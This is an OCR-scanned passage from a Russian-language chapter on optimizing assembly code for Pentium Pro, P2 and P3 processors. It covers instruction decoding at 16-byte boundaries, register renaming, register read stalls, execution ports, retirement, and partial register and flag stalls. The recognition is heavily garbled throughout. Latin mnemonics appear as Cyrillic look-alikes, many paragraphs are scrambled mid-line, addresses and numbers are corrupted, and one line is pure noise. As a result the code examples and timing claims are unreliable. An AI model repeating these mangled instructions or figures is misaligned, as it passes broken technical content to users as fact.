1о1ан ЦЕА ЕВХ, [ЕАХ+200] 1 
1017Н МОУ ВУТЕ РТВ [51], 0 2 
101АН В5В ЕСХ, ЕАХ 2 
10108 МОУ ВУТЕ РТВ [Е51+11,0 2 
10218 БЕС ЕСХ 1 
м И. 1 


Предположим, что первый БДИ начинается по адресу 10008 и заканчивается 1010. до 
завершения инструкции 'МОУ [МЕМ], 0’, поэтому следующий БДИ начнется в 1007. 
изакончится 10178. Поэтому третий БДИ начнется по адресу 10171 и захватит весь остаток 
цикла. Число тактов, которое уйдет на раскодировку определяется количеством 
инструкций, попадающих в 0. Всего их в цикле 5. Последний БДИ содержит три раскоди- 
руемых блоков, включая последние пять инструкций, и 16-байтную границу (10201). Из 
табл. 6.6 видно, что первый БДИ будет начинаться со следующей инструкции после 
хода (метка Ц.) и заканчиваться 10151. А именно внутри инструкции ГЕА, поэтом сле. 
дующий БДИ будет начинаться с 10111 до 1021, а последний — с 102 Ви О самого на, 
Теперь инструкции Г.ЕА и ПЕС совпопадают с началом БДИ, и поэтому они обе  "правля. 
тя в 10. В результате имеем 7 инструкции в 00, и на раскодироваку цикла во втором 

рении уходит 7 тактов. Последний БДИ содержит только одну группу треб ю 
раскодировки (РЕС ЕСХ / ЛМИ 1). Согласно табл. 6.6, следующий БДИ после команды 
перехода начнется с 16-байтной границы, т. е. 1000Н. Мы оказываемся в аналогичной си- 
она первой итерации, таким образом, раскодировка цикла занимает, соответст- 
о ит ых . Так как других узких мест нет, на выполнение цикла 1000 раз уйдет 

. ли бы стартовый адрес был другим и первая или п 
Инструкции пересекали 16-байтную грани в. Если 
а ную границу, в этом случае цикл занял бы 8000 тактов. Если 
и трукции цикла так, чтобы команды для 01 или 02 не попадали 

ь , ом случае выполнение цикла может занять всего 5000 тактов. 

к иепривеленный пример был преднамеренно построен так, что единственным 

мВ петоя доставка инструкций и их раскодировка. Самый легкий путь 

МЫ про мы Это структурировать код, чтобы он генерировал больше 3 

тер к, и раскол в ка не была узким местом, несмотря на приведенные по- 

де циклах это возможно, поскольку достаточно легко 
ровать доставку инструкций и их раскодировку. 
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Например, можно изменить стартовый адрес процедуры, чтобы избежать проблемы 16. 
байтных границ. Расположение сегмента кода на границе параграфа облегчает их нахождение 

Можно использовать директиву 'АГЛОМ 16' перед началом цикла, тогда ассембль 
поместит необходимую послеловательность инструкций МОР или им подобных, чтобы 
осуществить выравнивание. Большинство ассемблеров используют инструкцию 'ХСнс 
ЕВХ, ЕВХ' в качестве двухбайтного заполнителя (иногда ее называют “двухбайтных 
МОР'‘ом"). Кому бы ни пришла в голову эта идея, лучше данную инструкцию не исполь. 
зовать, потому что она занимает больше времени, чем два МОР'а на большинстве про- 
цессоров. Если цикл выполняется многократно, необходимо заботиться о том, какую 
инструкцию использовать в качестве заполнителя. Можно использовать инструкции, ко- 
торые делают что-нибудь полезное, например обновляют регистры, дабы избежать 
задержек при чтении регистра. Например, если используется ЕВР для адресации операн. 
дов и он дастаточно редко изменяется, можно использовать команды "МОУ ЕВРЕВр 
или 'АОО ЕВР, 0’ в качестве заполнителя, чтобы снизить влияние вышеупомянутых 
задержек. Можно также в. качестве заполнителя использовать команду ЕХСН $Т(0), по- 
тому что она не создает никакой нагрузки на устройства выполнения, при условии что 
5Т(0) содержит верное значение с плавающей запятой. 

Помочь может перегруппировка инструкций таким образом, чтобы переход 16- 
байтных границ между БДИ не вносил задержек. Однако это может стать очень сложной 
задачей и найти приемлемое решение не всегда возможно. 

Еще одна возможность оптимизации — манипуляция с длинами используемых инст- 
рукций. Иногда можно заменить одну инструкцию другой, имеющей отличную от нее 
длину кода операции. Транслятор ассемблера всегда выбирает наиболее короткую вер- 
сию инструкции. Например, 'ОЕС ЕСХ' занимает один байт, 'ЗОВ ЕСХ, 1' — три байта, 
однако можно приметить и 6-байтовую версию, которая даст аналогичный результат, 
используя чиловой параметр размером в двойное слово. 


ЗОВ ЕСХ, 9999 
ОВС $-4 
1 


Инструкции с операндами в памяти можно сделать на один байт длинее с помощью 
$1В-байта, но самым легким путем сделать инструкцию на один байт длинее будет 
добавление сегментното префикса 0$ (ОВ ЗЕВ). Микропроцессоры обычно принимают 
избыточные и ничего не значащие префиксы (не считая ГОСК), если длина инструкции 
не превышает 15-байт. Даже инструкции без операндов памяти могут иметь сегментный 


префикс. Поэтому если нужно, чтобы инструкция ОЕС ЕСХ' была два байта длиной, 
можно записать: 


РВ  ЗЕВ 
РЕС ЕСХ 


Следует помнить, что могут быть потери при раскодировке инструкции, если у Н%® 
окажется более одного префикса. Возможно, что инструкции с ничего не значащим" 
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фиксами, особенно префиксами повторения и закрытия, будут использоваться в бу- 
ших процессорах для расширения их набора, когда не останется свободных кодов, 


следовательно, использование сегментных префиксов с уже существующими инструк- 
| 
циями более безопасно. 


6.16. Переименование регистров (РРго, Р2 и РЗ) 


6.16.1. Уничтожение зависимостей 


Переименование регистров — это технология, используемая в современных микро- 


процессорах для минимизации взаимного влияния результатов инструкций при их парал- 
лельном выполнении. 


МОУ БАХ, [МЕМ1] 
ТМУЬ ВАХ, 6 

МОУ [МЕМ2], ЕАХ 
МОУ ВАХ, [МЕМЗ] 
ТМС ВАХ 

МОУ [МЕМ4], ЕАХ 


Здесь последние три инструкции независимы от трех первых в том смысле, что 
результат первых никак не влияет на результат последних. Чтобы оптимизировать этот 
код на процессорах Р1 для параллельного исполнения, требовалось привлечение допол- 
нительных регистров. РРго, Р2 и РЗ делают это автоматически. Они, в нашем примере, 
выделят новый теневой регистр для ЕАХ второй тройке инструкций. Таким образом, 
инструкция 'МОУ [МЕМ4], ЕАХ' может быть выполнена до окончания обработки мед- 
ленной инструкции ГМОГ.. 

Переименование регистров осуществляется автоматически. Новый временный 
регистр назначается как псевлоним постоянному регистру каждый раз, когда инструкция 
пишет в него. Например, инструкция 'ПМС ЕАХ' использует один временный регистр для 
ввода и другой временный регистр для вывода. Это, разумеется, не решает полностью 
проблему зависимостей инструкций, но имеет определенное значение для последующих 
считываний из регистра, о чем будет вестись разговор ниже. 

Все регистры общего назначения, указатель на стек, регистр флагов, регистры плавающей 
запятой, регистры ММХ, регистры ХММ и сегментные регистры могут быть переименованы. 

онтрольные слова и слово статуса плавающей запятой не могут быть переименованы. 

Общей практикой установки значений регистров в ноль является использование 
Операций типа 'ХОК ЕАХ,ЕАХ' или 'ЗОВ ЕАХ, ЕАХ`'. Эти инструкции не распознаются 
как независимые от предыдущего значения регистра, что приводит к замедлению начала 
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кций 
их исполнения. Чтобы избавиться от зависимости от предшествующих инструкций, сле. 
'МОУ ЕАХ, 0". 
дует использовать "МО , . 
” Переименование регистров контролируется таблицей р регистров (КАТ _ 
— геогдег БиЙег). Мопы из декоде. 
{ { ом перегруппировки (КОВ 
гео1{ег аНаз 1аЫе) и буфер о лек 
осле в резервационну цию 
очередь, затем в КОВ, ап 
ов поступают в ВАТ через , ‹ 
езегацой уаНоп). КАТ может обрабатывать только 3 мопа за такт. Это означает, что 
| такт. 
суммарная производительность процессора не может превышать 3 мопа ат Ты 
й но . ет 
ничений на количество переиме ВА 
Практически нет никаких огра ты 
переименовывать три регистра за такт и может переименовать один и тот же регистр три 
раза за один такт. 


6.16.2. Задержки чтения регистров 


Но существует другое ограничение, которое может быть весьма ых регистров, в 
за один такт могут быть считаны значения только из двух постоянн р | струк 
ограничение относится ко всем регистрам, которые могут быть исполь Г 
циях, не считая тех, в которые эти инструкции только пишут. 


моу [ЕБГ + Е5Т], ЕАХ 
МОУ ЕВХ, [ЕЗР + ЕВР] 


р тру р ру р ` Н УЧ В = 
Вто Я ИНС кция генери ет один моп, который читает ЕЗЕ и ЕВЕ ЕВХ е итывает 
ая и Ц д ы 
с оскольку инструк ИЯ ТОЛЬКО Н ет его Предположим ЧТо ЭТИ три мопа обраба- 
ИШ вн . ; 
Я, п Ц 
| ГС | Обо начит термином гриплет группу ИЗ трех последовательных мопов. 
ываются КА . з р 
о 6 т е | . Гак как ВО ожет обрабат олько два чтения из 
В мож ывать т ПОСТОЯН: 
бра атываемых КА 
ных регистров за гакт, а нам жно пять чтений, наш триплет 6 ет ержен на два 
дополнительных такта, прежде чем он попадет в резервационную с гтанцию. При трех ИЛИ 
четырех чтениях из постоянных рег истров он был бы задержен на один такт. 
Если ос у ществить замену предыд у щих инст р УКЦИИ на: 


МОУ [ЕОГ + ЕЗТ], ЕТ 
МОУ ЕВХ, [ЕБТ + ЕРТ} 


иплет № 
В этом случае произойдет только два чтения из регистров (ЕОГ и ЕЗ!Г) и тр 
будет задержен. > ОВ 
у Регистр, в который будет произведена запись текущим мопом, сохраняется, в 
} выгружен, что з ‚м 
бодно читать, пока он не будет , . 
поэтому из него можно сво о 
зка из КОВ является 
й аще и еще больше. Выгру , 
меньшей мере, три такта, а ч а 
ся актуальным. Друг 
й значение в регистре становит . 
стадией выполнения, когда на р. 
ез задержек, есл й 
итывание из регистра в КА - 
ми, возможно произвольное сч ыы 
ние еще не стало доступным модулю выполнения, это значит, что из регистра, в котор 
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ЕВХ 
$0В ЕСХ, БАХ 
ТМС ЕВХ 

МОУ ЕРХ, [ЕАХ] 
АБО ЕЗТ, ЕВХ 
АБР ЕРТ, ЕСХ 


Эти шесть инструкций генерируют | моп каждая. П 
идут через КАТ одновременно. Они читают регистры ЕВХ, ЕСХ и ЕАХ. Но так как 


‚› из них мо 
› И Поэтому учитываются только Е$Т и ЕО и, соответственно, нет за 


жек и во втором триплете. Если инструкцию 'ЗОВ ЕСХ, ЕАХ' в первом триллете з: 
нить на 'СМР ЕСХ, ЕАХ', тогда в ЕСХ не будет производиться запись и, следовател 
будет происходить задержка во втором триплете при чтении ЕЗТ, ЕПГ и ЕСХ. Подоб: 
же образом, если инструкцию ТМС ЕВХ' в первом триплете поменять на МОР, возниь 


ЕВХ и ЕП]. 


› нужно учесть все регистры, кс 
дят все целочисленные регистры, флаго, 
Й и регистры ММХ. Реги 
лучаев, когда используется только его ча. 
Р5. Сегментные регистр и указатель на инстр 


регистры, 
ХММ нужно принимать за два, кроме тех с 
например в командах АРО$$ и МОУНГ, 
цию не учитываются. Например, в 'ЗЕТИ АГ. должен учитываться флаговый ре 

Не АГ. В 'АРО ЕВХ, ЕСХ' Учитываются и ЕВХ, и ЕСХ, но не регистр флагов, поэте 


в него производится только запись. В команде 'РОЗН ЕАХ' считывается ЕАХ и указат 
Стека, а затем осуществляется запись в последний. 


Инструкция ЕХСН является особым случа 
НИЯ, 


гистр, 


13 
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Очередь между декодерами и КАТ так коротка (10 мопов), что невозможно предпо. 
ложить, что задержки чтения регистров не оказывают влияния на декодеры или какие-т‹ 
изменения в выводе декодеров не задерживают КАТ. 

Очень трудно предсказать, какие мопы пройдут через КАТ параллельно, если очеред, 
не пуста, а для оптимизированного кода очередь должна быть луста только после непра- 
вильно предсказанного перехода. Несколько мопов, генерируемых одной инструкцией. 
не обязательно пойдут через ВАТ одновременно; мопы просто выбираются последова- 
тельно из очереди по три за раз. Последовательность не нарушается предсказанным пе- 
реходом: мопы до и после перехода могут пойти через ВАТ одновременно. Только 
неправильно предсказанный переход сбросит очередь и начнет все сначала, поэтому три 
следующих мопа точно попадут в КАТ вместе. 

Если три последовательных мопа читают более, чем из двух регистров, было бы луч- 
ше, чтобы они не попадали одновременно в КАТ. Вероятность того, что они попадут 
туда одновременно — одна третья. Задержка чтения трех или четырех регистра в одной 
тройке мопов — один такт. Можно считать задержку в один такт эквивалентом загрузки 
еше трех мопов в КАТ. С вероятностью в 1/3, что три мопа пойдут в КАТ вместе, сред- 
няя задержка будет эквивалентна 3/3 = 1 моп. Чтобы посчитать среднее время, которое 
займет для некоторого кода проход через КАТ, следует к к количеству мопов добавить 
число потенциальных задержек чтения регистров и поделить на три. Нет смысла убирать 
задержки путем добавления дополнительных регистров, пока нет точной уверенности 

в том, какие мопы пойдут в КАТ одновременно. 

В ситуациях, когда требуется достижение производительности в 3 мопа за такт, ограниче- 
ние в чтении только двух постоянных регистров за такт может стать узким местом, которое 
будет трудно обойти. Приведем возможные пути избавления от задержек чтения регистров. 


№ Располагать мопы, которые считывают один и тот же регистр последовательно друг 
за другом, чтобы они попадали в один триплет. 

ш Располагать мопы, которые считывают разные регистры подальше друг от друга, 
чтобы они не могли попадать в один триплет. 

в Располагать мопы, которые читают регистр не дальше трех-четырех триплетов 
от инструкции, которая записывает или изменяет этот регистр, чтобы он не был вы- 
гружен прежде, чем будут произведены все необходимые операции чтения (не важно, 
если есть переход, если он будет правильно предсказан). Если есть основания пола- 
гать, что запись в регистр будет задержена, можно смело читать из него еще некото- 
рое количество инструкций. 

#ш Использовать абсолютные адреса вместо указателей, чтобы снизить количество счИ" 
тываемых регистров. 

ш Можно спровоцировать переименование регистра в триплете, если это не вызывает за- 
держку, чтобы предотвратить задержку чтения для этого регистра в одном или более 
следующих за ним триплетов: 'МОУ ЕБР.ЕБР /... / МОУ ЕАХ[ЕЗР-+8]'. Этот метод ст0" 
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ит дополнительный моп, поэтому его стоит применять только, если среднее предпола 
гаемое количество`предотвращенных задержек чтения больше 1/3. 


Для инструкций, которые генерируют больше одного мопа, можно узнать количеств 
мопов, чтобы сделать предсказание возможных задержек чтения регистра более точным 
Ниже приводятся наиболее общие случаи. 

6.16.2.1 Запись в память. Запись в память генерирует два мопа. Первый (в порт 4) - 
это операция сохранения, считывающая регистр, который нужно сохранить, второй мог 
вычисляет адрес памяти, при считывании любых регистров-указателей. 

МОУ [ЕБТ], ЕАХ 


Первый моп читает ВАХ, второй читает ЕПТ. 
ЕЗТР ОМОВР РТВ [ЕВХ+8*ЕСХ] 


Первый моп читает $Т{0), второй моп читает ЕВХ и ЕСХ, 


6.16.2.2. Чтение и модифицирование. Инструкция, которая считывает операнд из па 
мяти и модифицирует регистр с помощью какой-либо арифметической или логическо} 
операции, генерирует два мопа. Первый (порт 2) - это инструкция загрузки из памяти 
читающая любой регистр-указатель, второй моп — это арифметическая инструкция (пор' 
| или 2), читающая и пишущая в регистр назначения и, возможно, модифицирующа: 
регистр флагов. 


АО БАХ, [Е51+20] 


Первый моп читает ЕЗ[, второй моп читает ЕАХ и пишет ЕАХ и регистр флагов. 


6.16.2.3. Чтение/модифицирование/запись. Такие инструкции генерируют четыре мо 
па. Первый моп (порт 2), считывание регистра-указателя, второй (порт 0 или 1) читает | 
производит запись в исходный регистр и, возможно, пишет в регистр флагов, третий мол 
(порт 4) считывает только временный результат, который не учитывается здесь, четвер 
тый (порт 3) читает все регистры-указатели снова. Так как первый и четвертый регист 
не могут идти в КАТ вместе, получаем преимущество от того, что они читают один и то 
же регистр-указатель. 

ОВ [ЕЗТ+ЕРТ], ЕАХ 


Первый моп читает Е$1 и ЕПТ, второй читает ЕАХ и пишет в ЕАХ и в регистр флагое 
третий читает только временный результат, четвертый читает ЕТ и ЕП] снова. Вне зави 
симости о того, в каком порядке эти мопы пойдут в КАТ, можно быть увереными, чт 
моп, который читает ЕАХ, пойдет вместе с тем, который читает Е$] и ЕОТ. Поэтому за 


держка чтения регистра неизбежна в этой инструкции, если только один из регистров н 
был изменен ранее. ° 


6.16.2.4. Сохранение регистра в стек. Сохранение регистра в стек генерирует 3 мопа. Первы 
(порт 4) — это инструкция сохранения, чтение регистра. Второй моп (порт 4) генерирует адре 
читывая указатель на стек. Третий (порт 0 или 1) вычитает размер слова из указателя на сте! 
Читая и модифицируя его. 


13* 
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й СЧИТЬ_ 
Обратная операция генерирует два мопа, Первый (порт 2) загружает НИЯ ИТ 
й ил ек- 
вая указатель на стек и записывая значение в регистр. Второй моп (порт ррек 
тирует указатель на стек, читая и модифицируя его. я Повые 
6.16.2.5. Вызов. Ближний вызов генерирует 4 мопа (порты 1, 4, 3, 01). ЕР не тва 
мопа читают указатель на инструкцию (ЕР), который не учитывается, пот омуте он 
не может быть переименован. Третий моп читает указатель на стек. оследн ЧИ. 
тает и модифицирует его. р 
. ВЫЙ 
6.16.2.6. Возврат. Ближний возврат генерирует 4 мопа (порт 2, 01, 01, 1). Пер МОП 
считывает ЕЗР. Третий читает и модифицирует его. 


6.17. Изменение порядка выполнения инструкций 
(РРго, Р2 и РЗ) 


у у . пе- 
Б фер перегр плировки вмещает 40 мопов Каждый моп ждет В КОВ, пока все опе. 
ранды не будут готовы и не ПОЯВИТСЯ свободнь ТИ модуль для его выполнения. Это делает 
ВОЗМОЖНЫМ изменения порядка выполнения кода. Если часть кода задерживается, 
да, независимых от предыдущей. 
Операции записи в память не мо: у Т быть выполнены по порядку, если они зависят от 
Я Ес четыре б фе а за. С [8 о ож ать бо ших По р 
уг их операции записеи. ть че р у р писи, можн ИД ЛЬШ терь 
др п р ы 
произво ительности во вре гакой записи память или 3 р ну - 
р МЯ К з В аписи в некэши ован ю па 
МЯТЬ. Потому рекомендуется елать четыре записи за раз 6 Л у ерен м В ТОМ, ЧТО 
и быль ув Ы . 
д 
у про ессора ест чем еще аняться р Гр ть ег Щ р МЯ записями 
у 
Ц р Ъ, ще з , прежде чем на ЗИ. его еще четырь Х 
Чтение из памяти И другие инструкции МО: ут выполняться не по порядку, кроме Г , О 
и синхрони: И ующих опера ИИ. | 
Если код пишет в память 1 (е) какому- ГО адресу, а вскоре считывает от гуда же, тогда тени 
о ошибке ожет быть про едено до СИ. ОтТоМУ что КОВ не имеет понятия об адреса: 
во время перегруппировки. Эта ошибка устанавливается, когда вычисляется адрес, поэто - 
операция чтения в таком случае ПОЛ ется снова. отери при этом составляют 3 такта 
Единственный путь избежать этого — убедиться, что модуль выполнения будет ем ниб) 
му 
занят между последовательными записью в память и чтением из нее по то же адресу 
5 
про ессор х семейства еппит имеется несколько модулеи выполнения сгр 
рованных вокруг ПЯТИ портов. Порт 0 И 1 — ДЛЯ арифметических операции. Простые п 
есылк ари. метические ил гиче йе опе ии попадают в пор 
р Ы о ск И рац попад т 0 ИЛИ 1 В зависимое 
и, р ф 
от Гого, какой из них свободен. Порт 0 гакже обрабатывает умножение, деление, це; 
численные побитовые СДВИГИ И операции с плавающей запятой. Порт 1 М 
ОСНОВНЫ ун ИЯ зан ается перехо ами и некото ми о ерациями М 
дам ры 
Порт 2 обрабатывает все чтения из памяти и некоторые строковые операции. В разд. 


уппи- 
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можно найти полный список мопов, генерируемых инструкциями с указанием того, 
в какой порт они попадают. Следует обратить внимание, что все операции записи в па- 
мять требуют два мопа, один для порта 3, а другой для порта 4, в то время как операции 
чтения из памяти требуют только один моп (порт 2). 

В большинстве случаев каждый порт может получать один моп за такт. Это означает, 
что можно выполнять до 5 операций мопов за такт, если они попадают в пять разных 
портов, но так как есть ограничение на 3 мопа за такт, установленное ранее в конвейере, 
пока не удается выполнить больше 3 мопов за такт, в среднем. 

При оптимизации в 3 мопа за такт следует убедиться, что никакой порт не получает 
больше одной трети мопов. Следует использовать таблицу мопов в разд. 6.29 для под- 
счета, сколько мопов попадет в каждый порт. Если порты 0 и 1 перегружены, в то время 
как порт 2 свободен, можно улучшить код, заменив некоторые пересылки вида "регистр, 
регистр" или "регистр, числовое значение" на пересылку вида "регистр, память", чтобы 
перенести часть нагрузки с портов 0 и 1 на порт 2. 

Большинство мопов занимают один такт при выполнении, операции умножения, 
деления и большинство операций с плавающей запятой занимают больше времени. 

Сложения и вычитания с плавающей запятой занимают 3 такта, но модуль выполнения 
полностью конвейеризован, поэтому он может принимать новые ЕАОО и ЕЗОВ каждый такт, 
пока предыдущие инструкции выполняются (конечно, если они независимы друг от друга). 

Целочисленное умножение занимает 4 такта, умножения с плавающей запятой — 5, умно- 
жения ММХ — 3 такта. Умножения целых чисел и ММХ конвейеризованы, поэтому они могут 
получать новые инструкции каждый такт. Умножения чисел с плавающей запятой частично 
конвейеризованы: модуль выполнения может получать новую инструкцию ЕМПЛ, через два 
такта после получения предыдущей, поэтому максимальная производительность будет равна 
одному ЕМУ, за каждые два такта. "Дыры" между ЕМОГами нельзя заполнить целочислен- 
ными умножениями, так как они используют ту же схему. Сложения и умножения ХММ за- 
нимают 3 и 4 такта соотвественно и полностью конвейеризованы. Но так как каждый регистр 
ХММ представлен в виде двух 64-битных регистров, упакованная инструкция ХММ будет 
остоять из двух мопов, а производительность будет равна одной арифметической инструк- 
ции ХММ каждые два такта. Инструкции сложения и умножения ХММ могут выполняться 
параллельно, потому что они не используют одни и те же порты. 

Деление целых чисел и чисел с плавающей запятой занимает до 39 тактов и не кон- 
вейеризовано. Это означает, что модуль выполнения не может начать новое деление, 
пока предыдущие не будет выполнено. Вышесказанное относится к квадратному корню 
# Трансцендентным функциям. 

Инструкции переходов, вызовов и возвратов также не полностью конвейеризованы. Нель- 
3 ВЫПОЛНИТЬ НОВЫЙ переход в первом же такте после предыдущего. Поэтому максимальная 
Производительность для переходов, вызовов и возвратов равна одному за каждые два такта. 
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Желательно избегать инструкций, которые генерируют много мопов. Например, инст. 
рукцию ГООР ХХ лучше заменить на РЕС ЕСХ / ЛМ ХХ. 
Для двух последовательных РОР-инструкций, можно сделать следующую замену: 


РОР ЕСХ / РОР ЕВХ / РОР ЕАХ ; можно заменить на: 
МОУ ЕСХ, [ЕЗР] / МОУ БВХ, [Е5Р+4] / МОУ ВАХ, [Е$Р] / АБР Е$Р,12 
Первая группа команд генерирует 6 мопов, вторая — 4 и декодируется быстреь. 

Делать то же самое с инструкциями РИЗН менее выгодно, поскольку результирующий 
код будет генерировать задержки чтения регистров, если только нет других инструкций. 
которые можно вставить между ними, или какие-то регистры не были переименованы 
раньше. Делать подобное с инструкциями САМ, и КЕТ означает мешать правильном, 
предсказанию перехода. Также следует обратить внимание, что 'АОО ЕЗР' может вызы. 
вать задержку АС] в более ранних моделях процессоров. 


6.18. Вывод из обращения (РРго, Р2 и РЗ) 


Вывод из обращения (гейгетеп® — это процесс, когда временные регистры, исполе- 
зуемые мопами, копируются в постоянные регистры. Когда моп выполнен, он помечае 
ся в КОВ как готовый к выводу из обращения. 

Станция вывода из обращения может обрабатывать три мопа за такт. Может пок 
заться, что здесь нет никакой проблемы, потому что вывод уже ограничен в КАТ трех 
мопами за такт. Тем не менее, вывод из обращения может стать узким местом по дву 
причинам. Во-первых, инструкции должны выводиться из обращения по порядку. Ест 
моп был выполнен не по порядку, то он не может быть выведен из обращения, пока в 
мопы, предшествующие ему по порядку, не будут выведены из обращения до него. 

И второе ограничение — то, что переходы должны быть выведены из обращен 
в трех первых слотах станции. Как декодеры, 01 и 02 могут быть неактивны, если сл. 
дующая инструкция помещается только в 00, последние два слота станции вывода ! 
обращения могут быть неактивны, если следующий моп, который должен быть веведж 
из обращения, — это вычисленный переход. Это существенно в случае короткого цикл. 
число мопов в котором не кратно трем. 

Все мопы находятся в буфере перегруппировки (КОВ), пока они не будут изъяты ! 
обращения. КОВ вмещает 40 мопов. Это устанавливает ограничение на количество инс 
рукций, которые могут быть выполнены во время большой задержки, вызванной, напр 
мер, делением или другой медленной операцией. Прежде чем будет закончено делени 
КОВ будет заполнен выполняющимися мопами, ожидающими своего изъятия из обр- 
шения. Только когда деление будет закончено и изъято, последующие могут сами нача” 
изыматься из обращения, потому что этот процесс должен выполняться по порядку. ›„, 

В случае предварительного выполнения предсказанных переходов (см. раздел 5.” 
предварительно выполненные мопы не могут быть изъяты из обращения, пока процесс 
не проверит, что предсказание верно. В противном случае предварительно выполнен! ` 
мопы сбрасываются без изъятия из обращения. 








Глава 6. Оптимизация для пр 


оцессоров семейства Репит 


Следующие инструкции не могут 
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6.19. Частичные задержки (РРго, Р2 и РЗ) 


6.19.1. Частичные задержки регистра 


МОУ АТ, ВУТЕ РТВ [м8] 
МОУ ЕВХ, БАХ 


МОУ2Х ЕВХ, ВУТЕ РТВ [МЕМ8] 
АМР БАХ, ОРЕРЕРЕООН 


› как начнется чтение ИЗ 


Нужно 
ужно остерегаться частичных задержек, в смешанных операциях с данными 8, |6 и 32 бит. 


МОУ ВН, 0 
АБО ВХ, АХ 
; Задержка 
ТС 
еб ЕВХ ; задержка 
ывает задержки п 


МОУ ВАХ, [МЕМЗ2] 


АБО 

Ар т а }; Нет задержки 

оу сх’ А ; нет задержки 
, . 

мо хх ; нет задержки 


; задержка 


а всех 
процессорах существует разумный ком 
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ХОВ ВАХ, ЕАХ 


МОУ АГ, ВУТЕ РТВ [М8] 


Процессоры РРго, Р2 и РЗ делают специальное исключение для этой комбинации, 
поэтому при последующем чтении из ЕАХ задержки не возникнет. Происходит это 
потому, что регистр помечается как пустой, когда он ХОЁВ‘’ится сам с собой. Процессор 
помнит, что верхние 24 бита равны нулю и за счет этого избегается задержка. Этот меха- 
низм работает только со следующими комбинациями: 


ХОВ ЕАХ, БАХ 
МОУ АБ, 3 


МОУ ЕВХ, ЕАХ ; нет задержки 


ХОВ АН, АН 
МОУ АБ, 3 
МОУ ВХ, АХ 


; Нет задержки 


ХОВ ЕАХ, БАХ 

МОУ АН, 3 

МОУ ЕВХ, БАХ ; задержка 
508 ЕВХ, ЕВХ 

МОУ вЫ, БЫ 

МОУ ЕСХ, ЕВХ ; нет задержки 
МОУ ЕВХ, 0 

МОУ ВЫ, РЬ 

МОУ ЕСХ, ЕВХ ; задержка 
МОУ вы, БЫ 


ХОВ ЕВХ, ЕВХ ; нет задержки 


Установка регистра в ноль вычитанием его из самого себя работает так же, как ХОК, 
но обнуление регистра с помощью инструкции МОУ не предотвращает задержку. 
Вы можете установите ХОК снаружи цикла. 


ХОВ БАХ, ЕАХ 
МОУ ЕСХ, 100 
ВЫ: МОУ АБ, [ЕТ] 
МОУ [ЕРТ], БАХ р : 
ТМС ЕТ 
Ар ЕРТ, 4 
ВЕС ЕСХ 
ума БГ 


задержка 


1 


} 
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„нения ни вов оон анна а в о у нон оо в нае аыии ино спа ннававон но пани ни оз пая цониа ира японии рава осени воин нааа аа оно вона я ани увяз ани ньаньи 
..” 


Процессор помнит, что верхние 24 бита ЕАХ равны нулю, пока не происходит вызов 
обработчика прерывания, неправильного предсказания перехода или другого синхрони- 
зирующего события. | 

Следует помнить, что необходимо нейтрализовывать возможные частичные задержки 
регистра вышеописанным способом при вызове процедуры, которая будет выполнять! 
команду РОЗН с полным регистром. 


АБО ВЫ, АЁ 

МОУ [МЕМ8], ВЫ 

ХОК ЕВХ, ЕВХ 

САБЬ _Н1 9 Ъеуе] Рипсе1оп 


; нейтрализируем ВЫ 


Большинство языков высокого уровня выполняют РУЗН ЕВХ в начале процедуры, 
что в вышеприведенном примере приводило бы к частичной задержке регистра, если бы 
ее не нейтрализовали. 


Обнуление регистра с помощью ХОК не устраняет его зависимость от предыдущих 
инструкций. 


р1\У ЕВХ 

МОУ [МЕМ], БАХ 

МОУ ЕАХ, 0 ; прерываем зависимость 

ХОВ ЕАХ, БАХ ; предотвращаем частичную задержку регистра 
МОУ АБ, СЫ 


АБР ЕВХ, ЕАХ 


Обнуление регистра дважды может показаться излишним, но без 'МОУ ЕАХ, 0' 
последние инструкции будут ждать, пока выполниться медленный ОГУ, а без 'ХОК ЕАХ, 
ЕАХ' случится частичная задержка регистра. 

Инструкция 'ЕМ5Т$\/ АХ' уникальна: в 32-битном режиме она ведет себя так же, как 
если бы писала в весь ЕАХ. Фактически она делает в 32-битном режиме следующее: 

АМ ЕАХ, ОЕРРЕРООСОВ / ЕМУТЗМ ТЕМР / ОВ БАХ, ТЕМР 
‚ Поэтому при чтении регистра после этой инструкции не возникнет частично? 
задержки регистра в 32-битном режиме. 


ЕМУТЗМ АХ / МОУ ЕВХ,ЕАХ ; 


задержка только в 16-ти битном режиме 
МОУ АХ,О / ЕМЗТЗИ АХ ; 


задержка только в 32-х битном режиме 


6.19.2. Частичные задержки флагов 


Регистр флагов также может вызвать частичную задержку: 


СМР ВАХ, ЕВХ 
ТМС ЕСХ 
УВЕ ХХ ; 


задержка 
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Инструкция ВЕ читает и флаг переноса, и флаг нуля. Так как инструкция ПМС изме- 
няет флаг нуля, но не флаг переноса, то инструкции ВЕ приходится подождать, пока две 
предыдущие инструкции не будут выведены из обращения, прежде чем она сможет 
скомбинировать флаг переноса от инструкции СМР с флагом нуля от инструкции ПМС 
Подобная ситуация больше похожа на ошибку, чем на преднамеренную комбинацик» 
флагов. Чтобы скорректировать эту ситуацию, достаточно изменить ПМС ЕСХ на АБО 
ЕСХ, 1. Похожая ошибка, вызывающая задержку, — это 'ЗАНЕ / Л. ХХ". Инструкция Л. 
тестирует флаг знака и флаг переполнения, но не меняет последний. Чтобы исправить 
это, следует изменить "Л, ХХ' на '3$ ХХ'. 

Неожиданно (и в противоположность тому, что говорится в руководствах от пе 
частичная задержка регистра может случиться, если были изменены какие-то биты реги- 
стра флагов, а затем считаны неизмененные: 


СМР ЕАХ, ЕВХ 

ТМС ЕСХ 

9 ХХ ; задержка 
но не при чтении только изменных битов: 


СМР ВАХ, ЕВХ 

ТС ЕСХ 

ЧЕ ХХ ; нет задержки 

Частичные задержки флагов возникают, как правило, при использовании инструкций, 

которые считывают некоторые или все биты регистра флагов, например ГАНЕ, РОЗНЕ, 
РОЗНЕО. Инструкции, которые вызывают задержку, если за ними идут ГАНЕ или 
РОЗНЕ(О), следующие: ПМС, ОЕС, ТЕЗТ, битовые тесты, битовые сканирования, СГС, 
$ТС, СМС, СТО, $ТЬ, СЫ, $11, МАГ, ТМУЕ и все виды битовых сдвигов и вращений. 
Следующие инструкции не вызывают задержки: АМО, ОВ, ХОК, АОО, АОС, $0В, ВВ, 
СМР, МЕС. Странно, что ТЕЗТ и АМО ведут себя по-разному, хотя по описанию они 
делают с флагами одно и то же. Можно использовать инструкции ЗЕТсс вместо ГАНЕ 
или РОЗНЕ(О) для сохранения значения флага, чтобы избежать задержки. 


Примеры 

ТС ВАХ / РОЗНЕР ; задержка 

АБР ЕАХ,1 / РОЗНЕР ; нет задержки 

ЗНВ ЕАХ,1 / РОЗНЕР ; задержка 

